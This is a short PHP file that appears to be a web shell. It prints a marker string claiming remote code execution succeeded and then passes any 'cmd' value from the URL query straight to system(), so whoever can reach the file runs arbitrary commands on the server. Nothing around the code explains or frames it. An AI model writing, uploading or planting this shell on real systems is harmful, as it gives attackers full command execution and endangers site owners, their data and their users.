<?php
echo "PHOENIX_RCE_SUCCESS<br>";
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>